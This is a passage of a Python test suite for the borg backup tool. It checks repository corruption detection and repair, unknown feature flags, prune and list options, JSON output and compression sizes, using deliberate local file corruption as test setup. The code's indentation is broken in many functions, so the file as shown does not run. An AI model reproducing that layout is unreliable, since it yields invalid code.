    self.assert_in('deleted archive was corrupted', output)
    self.cmd('check', '--repair', self.repository_location)
    output = self.cmd('list', self.repository_location)
    self.assert_not_in('test', output)
def test_delete_double_force(self):
    """Test delete --force --force on an archive whose items metadata stream is corrupted."""
    self.cmd('init', '--encryption=none', self.repository_location)
    self.create_src_archive('test')
    with Repository(self.repository_path, exclusive=True) as repository:
        manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
        archive = Archive(repository, key, manifest, 'test')
        # overwrite the first items metadata chunk with garbage
        id = archive.metadata.items[0]
        repository.put(id, b'corrupted items metadata stream chunk')
        repository.commit(compact=False)
    self.cmd('delete', '--force', '--force', self.repository_location + '::test')
    self.cmd('check', '--repair', self.repository_location)
    output = self.cmd('list', self.repository_location)
    self.assert_not_in('test', output)
def test_corrupted_repository(self):
    """Test that 'borg check' detects on-disk segment corruption (and that
    --show-version / --info control the log output as expected)."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_src_archive('test')
    self.cmd('extract', '--dry-run', self.repository_location + '::test')
    output = self.cmd('check', '--show-version', self.repository_location)
    self.assert_in('borgbackup version', output)  # implied output even without --info given
    self.assert_not_in('Starting repository check', output)  # --info not given for root logger
    # corrupt 4 bytes in the second-newest segment file
    name = sorted(os.listdir(os.path.join(self.tmpdir, 'repository', 'data', '0')), reverse=True)[1]
    with open(os.path.join(self.tmpdir, 'repository', 'data', '0', name), 'r+b') as fd:
        fd.seek(100)
        fd.write(b'XXXX')
    output = self.cmd('check', '--info', self.repository_location, exit_code=1)
    self.assert_in('Starting repository check', output)  # --info given for root logger
# we currently need to be able to create a lock directory inside the repo:
@pytest.mark.xfail(reason="we need to be able to create the lock directory inside the repo")
def test_readonly_repository(self):
    """Test read-only access (extract --dry-run) to a chmod'ed read-only repository."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_src_archive('test')
    # strip all write permission bits from the repo tree
    os.system('chmod -R ugo-w ' + self.repository_path)
    try:
        self.cmd('extract', '--dry-run', self.repository_location + '::test')
    finally:
        # Restore permissions so shutil.rmtree is able to delete it
        os.system('chmod -R u+w ' + self.repository_path)
@pytest.mark.skipif('BORG_TESTS_IGNORE_MODES' in os.environ, reason='modes unreliable')
def test_umask(self):
    """Test that a fresh repository directory is created with mode 0700."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    mode = os.stat(self.repository_path).st_mode
    self.assertEqual(stat.S_IMODE(mode), 0o700)
def test_create_dry_run(self):
    """Test that create --dry-run leaves the manifest without any archives."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', '--dry-run', self.repository_location + '::test', 'input')
    # Make sure no archive has been created
    with Repository(self.repository_path) as repository:
        manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
    self.assert_equal(len(manifest.archives), 0)
    def add_unknown_feature(self, operation):
        """Mark *operation* in the manifest as requiring 'unknown-feature'.

        This simulates a repository written by a newer borg whose mandatory
        feature this client does not support.
        """
        with Repository(self.repository_path, exclusive=True) as repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            manifest.config[b'feature_flags'] = {operation.value.encode(): {b'mandatory': [b'unknown-feature']}}
            manifest.write()
            repository.commit(compact=False)
    def cmd_raises_unknown_feature(self, args):
        """Assert that running *args* fails because of the unknown mandatory feature."""
        if self.FORK_DEFAULT:
            # running in a subprocess: we can only observe the exit code
            self.cmd(*args, exit_code=EXIT_ERROR)
        else:
            # running in-process: we can check the exception itself
            with pytest.raises(MandatoryFeatureUnsupported) as excinfo:
                self.cmd(*args)
            assert excinfo.value.args == (['unknown-feature'],)
def test_unknown_feature_on_create(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.WRITE)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_cache_sync(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
self.add_unknown_feature(Manifest.Operation.READ)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_change_passphrase(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['key', 'change-passphrase', self.repository_location])
    def test_unknown_feature_on_read(self):
        """An unknown mandatory READ feature must block extract, list and info."""
        print(self.cmd('init', '--encryption=repokey', self.repository_location))
        self.cmd('create', self.repository_location + '::test', 'input')
        self.add_unknown_feature(Manifest.Operation.READ)
        # extract must run from a different cwd so 'input' is not overwritten
        with changedir('output'):
            self.cmd_raises_unknown_feature(['extract', self.repository_location + '::test'])
        self.cmd_raises_unknown_feature(['list', self.repository_location])
        self.cmd_raises_unknown_feature(['info', self.repository_location + '::test'])
def test_unknown_feature_on_rename(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['rename', self.repository_location + '::test', 'other'])
    def test_unknown_feature_on_delete(self):
        """Unknown mandatory DELETE feature blocks archive delete/prune, not repo delete."""
        print(self.cmd('init', '--encryption=repokey', self.repository_location))
        self.cmd('create', self.repository_location + '::test', 'input')
        self.add_unknown_feature(Manifest.Operation.DELETE)
        # delete of an archive raises
        self.cmd_raises_unknown_feature(['delete', self.repository_location + '::test'])
        self.cmd_raises_unknown_feature(['prune', '--keep-daily=3', self.repository_location])
        # delete of the whole repository ignores features
        self.cmd('delete', self.repository_location)
    @unittest.skipUnless(has_llfuse, 'llfuse not installed')
    def test_unknown_feature_on_mount(self):
        """An unknown mandatory READ feature must make 'mount' fail."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        self.add_unknown_feature(Manifest.Operation.READ)
        mountpoint = os.path.join(self.tmpdir, 'mountpoint')
        os.mkdir(mountpoint)
        # XXX this might hang if it doesn't raise an error
        self.cmd_raises_unknown_feature(['mount', self.repository_location + '::test', mountpoint])
    @pytest.mark.allow_cache_wipe
    def test_unknown_mandatory_feature_in_cache(self):
        """A cache carrying an unknown mandatory feature must be wiped and rebuilt.

        After the wipe-and-rebuild, the cache's mandatory feature set must be
        empty again.
        """
        if self.prefix:
            path_prefix = 'ssh://__testsuite__'
        else:
            path_prefix = ''
        print(self.cmd('init', '--encryption=repokey', self.repository_location))
        # poison the local cache with an unknown mandatory feature
        with Repository(self.repository_path, exclusive=True) as repository:
            if path_prefix:
                repository._location = Location(self.repository_location)
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            with Cache(repository, key, manifest) as cache:
                cache.begin_txn()
                cache.cache_config.mandatory_features = set(['unknown-feature'])
                cache.commit()
        if self.FORK_DEFAULT:
            # subprocess: we can only verify that create still succeeds
            self.cmd('create', self.repository_location + '::test', 'input')
        else:
            # in-process: additionally verify that wipe_cache was actually called
            called = False
            wipe_cache_safe = LocalCache.wipe_cache
            def wipe_wrapper(*args):
                nonlocal called
                called = True
                wipe_cache_safe(*args)
            with patch.object(LocalCache, 'wipe_cache', wipe_wrapper):
                self.cmd('create', self.repository_location + '::test', 'input')
            assert called
        # the rebuilt cache must not carry the unknown feature anymore
        with Repository(self.repository_path, exclusive=True) as repository:
            if path_prefix:
                repository._location = Location(self.repository_location)
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            with Cache(repository, key, manifest) as cache:
                assert cache.cache_config.mandatory_features == set([])
def test_progress_on(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--progress', self.repository_location + '::test4', 'input')
self.assert_in("\r", output)
def test_progress_off(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', self.repository_location + '::test5', 'input')
self.assert_not_in("\r", output)
    def test_file_status(self):
        """test that various file status show expected results

        clearly incomplete: only tests for the weird "unchanged" status for now"""
        self.create_regular_file('file1', size=1024 * 80)
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # first backup: everything is new
        output = self.cmd('create', '--list', self.repository_location + '::test', 'input')
        self.assert_in("A input/file1", output)
        self.assert_in("A input/file2", output)
        # should find first file as unmodified
        output = self.cmd('create', '--list', self.repository_location + '::test1', 'input')
        self.assert_in("U input/file1", output)
        # this is expected, although surprising, for why, see:
        # https://borgbackup.readthedocs.org/en/latest/faq.html#i-am-seeing-a-added-status-for-a-unchanged-file
        self.assert_in("A input/file2", output)
    def test_file_status_cs_cache_mode(self):
        """test that a changed file with faked "previous" mtime still gets backed up in ctime,size cache_mode"""
        self.create_regular_file('file1', contents=b'123')
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=10)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test1', 'input')
        # modify file1, but cheat with the mtime (and atime) and also keep same size:
        st = os.stat('input/file1')
        self.create_regular_file('file1', contents=b'321')
        # restore the old atime/mtime; rewriting the file changed ctime, which cannot be faked
        os.utime('input/file1', ns=(st.st_atime_ns, st.st_mtime_ns))
        # this mode uses ctime for change detection, so it should find file1 as modified
        output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test2', 'input')
        self.assert_in("M input/file1", output)
    def test_file_status_ms_cache_mode(self):
        """test that a chmod'ed file with no content changes does not get chunked again in mtime,size cache_mode"""
        self.create_regular_file('file1', size=10)
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=10)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test1', 'input')
        # change mode of file1, no content change:
        st = os.stat('input/file1')
        os.chmod('input/file1', st.st_mode ^ stat.S_IRWXO)  # this triggers a ctime change, but mtime is unchanged
        # this mode uses mtime for change detection, so it should find file1 as unmodified
        output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test2', 'input')
        self.assert_in("U input/file1", output)
    def test_file_status_rc_cache_mode(self):
        """test that files get rechunked unconditionally in rechunk,ctime cache mode"""
        self.create_regular_file('file1', size=10)
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=10)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test1', 'input')
        # no changes here, but this mode rechunks unconditionally
        # so even an unchanged file must show up with 'A' (added) status:
        output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test2', 'input')
        self.assert_in("A input/file1", output)
    def test_file_status_excluded(self):
        """test that excluded paths are listed"""
        self.create_regular_file('file1', size=1024 * 80)
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=1024 * 80)
        if has_lchflags:
            # file3 carries the nodump flag, so --exclude-nodump must skip it
            self.create_regular_file('file3', size=1024 * 80)
            platform.set_flags(os.path.join(self.input_path, 'file3'), stat.UF_NODUMP)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test', 'input')
        self.assert_in("A input/file1", output)
        self.assert_in("A input/file2", output)
        if has_lchflags:
            self.assert_in("x input/file3", output)
        # should find second file as excluded
        output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test1', 'input', '--exclude', '*/file2')
        self.assert_in("U input/file1", output)
        self.assert_in("x input/file2", output)
        if has_lchflags:
            self.assert_in("x input/file3", output)
def test_create_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
create_info = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
# The usual keys
assert 'encryption' in create_info
assert 'repository' in create_info
assert 'cache' in create_info
assert 'last_modified' in create_info['repository']
archive = create_info['archive']
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
    def test_create_topical(self):
        """Test --list/--filter combinations for what file statuses get printed."""
        self.create_regular_file('file1', size=1024 * 80)
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # no listing by default
        output = self.cmd('create', self.repository_location + '::test', 'input')
        self.assert_not_in('file1', output)
        # shouldn't be listed even if unchanged
        output = self.cmd('create', self.repository_location + '::test0', 'input')
        self.assert_not_in('file1', output)
        # should list the file as unchanged
        output = self.cmd('create', '--list', '--filter=U', self.repository_location + '::test1', 'input')
        self.assert_in('file1', output)
        # should *not* list the file as changed
        output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test2', 'input')
        self.assert_not_in('file1', output)
        # change the file
        self.create_regular_file('file1', size=1024 * 100)
        # should list the file as changed
        output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test3', 'input')
        self.assert_in('file1', output)
    @pytest.mark.skipif(not are_fifos_supported(), reason='FIFOs not supported')
    def test_create_read_special_symlink(self):
        """With --read-special, a symlink to a FIFO is followed and its data archived."""
        from threading import Thread
        def fifo_feeder(fifo_fn, data):
            # writer side of the FIFO; runs in a thread because open() blocks
            # until the reader (borg create) opens the other end
            fd = os.open(fifo_fn, os.O_WRONLY)
            try:
                os.write(fd, data)
            finally:
                os.close(fd)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        archive = self.repository_location + '::test'
        data = b'foobar' * 1000
        fifo_fn = os.path.join(self.input_path, 'fifo')
        link_fn = os.path.join(self.input_path, 'link_fifo')
        os.mkfifo(fifo_fn)
        os.symlink(fifo_fn, link_fn)
        t = Thread(target=fifo_feeder, args=(fifo_fn, data))
        t.start()
        try:
            self.cmd('create', '--read-special', archive, 'input/link_fifo')
        finally:
            t.join()
        # the extracted entry must be a regular file containing the FIFO's data
        with changedir('output'):
            self.cmd('extract', archive)
            fifo_fn = 'input/link_fifo'
            with open(fifo_fn, 'rb') as f:
                extracted_data = f.read()
        assert extracted_data == data
def test_create_read_special_broken_symlink(self):
os.symlink('somewhere doesnt exist', os.path.join(self.input_path, 'link'))
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '--read-special', archive, 'input')
output = self.cmd('list', archive)
assert 'input/link -> somewhere doesnt exist' in output
# def test_cmdline_compatibility(self):
# self.create_regular_file('file1', size=1024 * 80)
# self.cmd('init', '--encryption=repokey', self.repository_location)
# self.cmd('create', self.repository_location + '::test', 'input')
# output = self.cmd('foo', self.repository_location, '--old')
# self.assert_in('"--old" has been deprecated. Use "--new" instead', output)
    def test_prune_repository(self):
        """Test prune rules, including special handling of checkpoint archives."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test1', src_dir)
        self.cmd('create', self.repository_location + '::test2', src_dir)
        # these are not really checkpoints, but they look like some:
        self.cmd('create', self.repository_location + '::test3.checkpoint', src_dir)
        self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
        self.cmd('create', self.repository_location + '::test4.checkpoint', src_dir)
        output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2')
        assert re.search(r'Would prune:\s+test1', output)
        # must keep the latest non-checkpoint archive:
        assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
        # must keep the latest checkpoint archive:
        assert re.search(r'Keeping checkpoint archive:\s+test4.checkpoint', output)
        # --dry-run must not have removed anything:
        output = self.cmd('list', self.repository_location)
        self.assert_in('test1', output)
        self.assert_in('test2', output)
        self.assert_in('test3.checkpoint', output)
        self.assert_in('test3.checkpoint.1', output)
        self.assert_in('test4.checkpoint', output)
        self.cmd('prune', self.repository_location, '--keep-daily=2')
        output = self.cmd('list', self.repository_location)
        self.assert_not_in('test1', output)
        # the latest non-checkpoint archive must be still there:
        self.assert_in('test2', output)
        # only the latest checkpoint archive must still be there:
        self.assert_not_in('test3.checkpoint', output)
        self.assert_not_in('test3.checkpoint.1', output)
        self.assert_in('test4.checkpoint', output)
        # now we supersede the latest checkpoint by a successful backup:
        self.cmd('create', self.repository_location + '::test5', src_dir)
        self.cmd('prune', self.repository_location, '--keep-daily=2')
        output = self.cmd('list', self.repository_location)
        # all checkpoints should be gone now:
        self.assert_not_in('checkpoint', output)
        # the latest archive must be still there
        self.assert_in('test5', output)
def test_prune_repository_save_space(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
assert re.search(r'Would prune:\s+test1', output)
output = self.cmd('list', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.cmd('prune', '--save-space', self.repository_location, '--keep-daily=2')
output = self.cmd('list', self.repository_location)
self.assert_not_in('test1', output)
self.assert_in('test2', output)
    def test_prune_repository_prefix(self):
        """'prune --prefix=' must only consider archives matching the prefix."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::foo-2015-08-12-10:00', src_dir)
        self.cmd('create', self.repository_location + '::foo-2015-08-12-20:00', src_dir)
        self.cmd('create', self.repository_location + '::bar-2015-08-12-10:00', src_dir)
        self.cmd('create', self.repository_location + '::bar-2015-08-12-20:00', src_dir)
        output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2', '--prefix=foo-')
        assert re.search(r'Keeping archive \(rule: daily #1\):\s+foo-2015-08-12-20:00', output)
        assert re.search(r'Would prune:\s+foo-2015-08-12-10:00', output)
        # dry-run must not have removed anything:
        output = self.cmd('list', self.repository_location)
        self.assert_in('foo-2015-08-12-10:00', output)
        self.assert_in('foo-2015-08-12-20:00', output)
        self.assert_in('bar-2015-08-12-10:00', output)
        self.assert_in('bar-2015-08-12-20:00', output)
        self.cmd('prune', self.repository_location, '--keep-daily=2', '--prefix=foo-')
        # only the older foo- archive was pruned; bar- archives are untouched:
        output = self.cmd('list', self.repository_location)
        self.assert_not_in('foo-2015-08-12-10:00', output)
        self.assert_in('foo-2015-08-12-20:00', output)
        self.assert_in('bar-2015-08-12-10:00', output)
        self.assert_in('bar-2015-08-12-20:00', output)
    def test_prune_repository_glob(self):
        """'prune --glob-archives=' must only consider archives matching the glob."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::2015-08-12-10:00-foo', src_dir)
        self.cmd('create', self.repository_location + '::2015-08-12-20:00-foo', src_dir)
        self.cmd('create', self.repository_location + '::2015-08-12-10:00-bar', src_dir)
        self.cmd('create', self.repository_location + '::2015-08-12-20:00-bar', src_dir)
        output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2', '--glob-archives=2015-*-foo')
        assert re.search(r'Keeping archive \(rule: daily #1\):\s+2015-08-12-20:00-foo', output)
        assert re.search(r'Would prune:\s+2015-08-12-10:00-foo', output)
        # dry-run must not have removed anything:
        output = self.cmd('list', self.repository_location)
        self.assert_in('2015-08-12-10:00-foo', output)
        self.assert_in('2015-08-12-20:00-foo', output)
        self.assert_in('2015-08-12-10:00-bar', output)
        self.assert_in('2015-08-12-20:00-bar', output)
        self.cmd('prune', self.repository_location, '--keep-daily=2', '--glob-archives=2015-*-foo')
        # only the older -foo archive was pruned; -bar archives are untouched:
        output = self.cmd('list', self.repository_location)
        self.assert_not_in('2015-08-12-10:00-foo', output)
        self.assert_in('2015-08-12-20:00-foo', output)
        self.assert_in('2015-08-12-10:00-bar', output)
        self.assert_in('2015-08-12-20:00-bar', output)
def test_list_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test-1', src_dir)
self.cmd('create', self.repository_location + '::something-else-than-test-1', src_dir)
self.cmd('create', self.repository_location + '::test-2', src_dir)
output = self.cmd('list', '--prefix=test-', self.repository_location)
self.assert_in('test-1', output)
self.assert_in('test-2', output)
self.assert_not_in('something-else', output)
    def test_list_format(self):
        """The explicit default --format must match the default listing; a different format must not."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        test_archive = self.repository_location + '::test'
        self.cmd('create', test_archive, src_dir)
        output_1 = self.cmd('list', test_archive)
        # output_2 spells out the built-in default format explicitly
        output_2 = self.cmd('list', '--format', '{mode} {user:6} {group:6} {size:8d} {mtime} {path}{extra}{NEWLINE}', test_archive)
        output_3 = self.cmd('list', '--format', '{mtime:%s} {path}{NL}', test_archive)
        self.assertEqual(output_1, output_2)
        self.assertNotEqual(output_1, output_3)
    def test_list_repository_format(self):
        """Test --format/--short for repository-level listings (archive names)."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', '--comment', 'comment 1', self.repository_location + '::test-1', src_dir)
        self.cmd('create', '--comment', 'comment 2', self.repository_location + '::test-2', src_dir)
        output_1 = self.cmd('list', self.repository_location)
        # explicit default format must equal the implicit default
        output_2 = self.cmd('list', '--format', '{archive:<36} {time} [{id}]{NL}', self.repository_location)
        self.assertEqual(output_1, output_2)
        output_1 = self.cmd('list', '--short', self.repository_location)
        self.assertEqual(output_1, 'test-1\ntest-2\n')
        output_1 = self.cmd('list', '--format', '{barchive}/', self.repository_location)
        self.assertEqual(output_1, 'test-1/test-2/')
        output_3 = self.cmd('list', '--format', '{name} {comment}{NL}', self.repository_location)
        self.assert_in('test-1 comment 1\n', output_3)
        self.assert_in('test-2 comment 2\n', output_3)
def test_list_hash(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('amb', contents=b'a' * 1000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{sha256} {path}{NL}', test_archive)
assert "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0 input/amb" in output
assert "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 input/empty_file" in output
def test_list_chunk_counts(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('two_chunks')
with open(os.path.join(self.input_path, 'two_chunks'), 'wb') as fd:
fd.write(b'abba' * 2000000)
fd.write(b'baab' * 2000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{num_chunks} {unique_chunks} {path}{NL}', test_archive)
assert "0 0 input/empty_file" in output
assert "2 2 input/two_chunks" in output
    def test_list_size(self):
        """Test the relations between {size}, {csize}, {dsize} and {dcsize}."""
        self.create_regular_file('compressible_file', size=10000)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        test_archive = self.repository_location + '::test'
        self.cmd('create', '-C', 'lz4', test_archive, 'input')
        output = self.cmd('list', '--format', '{size} {csize} {dsize} {dcsize} {path}{NL}', test_archive)
        size, csize, dsize, dcsize, path = output.split("\n")[1].split(" ")
        # compressed must be smaller than raw, deduplicated never larger than total
        assert int(csize) < int(size)
        assert int(dcsize) < int(dsize)
        assert int(dsize) <= int(size)
        assert int(dcsize) <= int(csize)
    def test_list_json(self):
        """Test 'list --json' (repo level) and '--json-lines' (archive level)."""
        self.create_regular_file('file1', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        list_repo = json.loads(self.cmd('list', '--json', self.repository_location))
        repository = list_repo['repository']
        assert len(repository['id']) == 64
        assert datetime.strptime(repository['last_modified'], ISO_FORMAT)  # must not raise
        assert list_repo['encryption']['mode'] == 'repokey'
        assert 'keyfile' not in list_repo['encryption']
        archive0 = list_repo['archives'][0]
        assert datetime.strptime(archive0['time'], ISO_FORMAT)  # must not raise
        # archive-level listing: one JSON object per line (dir + file = 2 items)
        list_archive = self.cmd('list', '--json-lines', self.repository_location + '::test')
        items = [json.loads(s) for s in list_archive.splitlines()]
        assert len(items) == 2
        file1 = items[1]
        assert file1['path'] == 'input/file1'
        assert file1['size'] == 81920
        assert datetime.strptime(file1['mtime'], ISO_FORMAT)  # must not raise
        # a custom --format must be merged into the JSON lines
        list_archive = self.cmd('list', '--json-lines', '--format={sha256}', self.repository_location + '::test')
        items = [json.loads(s) for s in list_archive.splitlines()]
        assert len(items) == 2
        file1 = items[1]
        assert file1['path'] == 'input/file1'
        assert file1['sha256'] == 'b2915eb69f260d8d3c25249195f2c8f4f716ea82ec760ae929732c0262442b2b'
def test_list_json_args(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('list', '--json-lines', self.repository_location, exit_code=2)
self.cmd('list', '--json', self.repository_location + '::archive', exit_code=2)
    def test_log_json(self):
        """--log-json must emit one well-formed JSON message object per log line."""
        self.create_test_files()
        self.cmd('init', '--encryption=repokey', self.repository_location)
        log = self.cmd('create', '--log-json', self.repository_location + '::test', 'input', '--list', '--debug')
        messages = {}  # type -> message, one of each kind
        for line in log.splitlines():
            msg = json.loads(line)
            messages[msg['type']] = msg
        file_status = messages['file_status']
        assert 'status' in file_status
        assert file_status['path'].startswith('input')
        log_message = messages['log_message']
        assert isinstance(log_message['time'], float)
        assert log_message['levelname'] == 'DEBUG'  # there should only be DEBUG messages
        assert isinstance(log_message['message'], str)
    def test_debug_profile(self):
        """--debug-profile must write a profile loadable via 'debug convert-profile',
        and also accept a .pyprof target for direct pstats loading."""
        self.create_test_files()
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input', '--debug-profile=create.prof')
        self.cmd('debug', 'convert-profile', 'create.prof', 'create.pyprof')
        stats = pstats.Stats('create.pyprof')
        stats.strip_dirs()
        stats.sort_stats('cumtime')
        # a .pyprof target writes pstats format directly (unmarshalling it is unsafe):
        self.cmd('create', self.repository_location + '::test2', 'input', '--debug-profile=create.pyprof')
        stats = pstats.Stats('create.pyprof')  # Only do this on trusted data!
        stats.strip_dirs()
        stats.sort_stats('cumtime')
def test_common_options(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('--debug', 'create', self.repository_location + '::test', 'input')
assert 'security: read previous location' in log
def _get_sizes(self, compression, compressible, size=10000):
if compressible:
contents = b'X' * size
else:
contents = os.urandom(size)
self.create_regular_file('file', contents=contents)
self.cmd('init', '--encryption=none', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '-C', compression, archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {path}{NL}', archive)
size, csize, path = output.split("\n")[1].split(" ")
return int(size), int(csize)
def test_compression_none_compressible(self):
size, csize = self._get_sizes('none', compressible=True)
assert csize >= size
assert csize == size + 3
def test_compression_none_uncompressible(self):
size, csize = self._get_sizes('none', compressible=False)
assert csize >= size
assert csize == size + 3
def test_compression_zlib_compressible(self):
size, csize = self._get_sizes('zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35
def test_compression_zlib_uncompressible(self):
size, csize = self._get_sizes('zlib', compressible=False)
assert csize >= size
def test_compression_auto_compressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35 # same as compression 'zlib'
def test_compression_auto_uncompressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=False)
assert csize >= size
assert csize == size + 3 # same as compression 'none'
def test_compression_lz4_compressible(self):
size, csize = self._get_sizes('lz4', compressible=True)
assert csize < size * 0.1
def test_compression_lz4_uncompressible(self):
size, csize = self._get_sizes('lz4', compressible=False)
assert csize >= size
def test_compression_lzma_compressible(self):
size, csize = self._get_sizes('lzma', compressible=True)
assert csize < size * 0.1
def test_compression_lzma_uncompressible(self):
size, csize = self._get_sizes('lzma', compressible=False)
assert csize >= size
    def test_change_passphrase(self):
        """'key change-passphrase' must switch the repo key to BORG_NEW_PASSPHRASE."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        os.environ['BORG_NEW_PASSPHRASE'] = 'newpassphrase'
        # here we have both BORG_PASSPHRASE and BORG_NEW_PASSPHRASE set:
        self.cmd('key', 'change-passphrase', self.repository_location)
        # the repo must now only open with the new passphrase:
        os.environ['BORG_PASSPHRASE'] = 'newpassphrase'
        self.cmd('list', self.repository_location)
def test_break_lock(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('break-lock', self.repository_location)
def test_usage(self):
self.cmd()
self.cmd('-h')
def test_help(self):
assert 'Borg' in self.cmd('help')
assert 'patterns' in self.cmd('help', 'patterns')
assert 'Initialize' in self.cmd('help', 'init')
assert 'positional arguments' not in self.cmd('help', 'init', '--epilog-only')
assert 'This command initializes' not in self.cmd('help', 'init', '--usage-only')
    @unittest.skipUnless(has_llfuse, 'llfuse not installed')
    def test_fuse(self):
        """End-to-end FUSE mount test: directory trees, stat metadata, file
        contents, hardlinks, symlinks, FIFOs and xattrs must all round-trip
        through a mounted repository/archive."""
        def has_noatime(some_file):
            # detect whether O_NOATIME is available and effective on this system
            atime_before = os.stat(some_file).st_atime_ns
            try:
                os.close(os.open(some_file, flags_noatime))
            except PermissionError:
                return False
            else:
                atime_after = os.stat(some_file).st_atime_ns
                noatime_used = flags_noatime != flags_normal
                return noatime_used and atime_before == atime_after
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_test_files()
        have_noatime = has_noatime('input/file1')
        self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive', 'input')
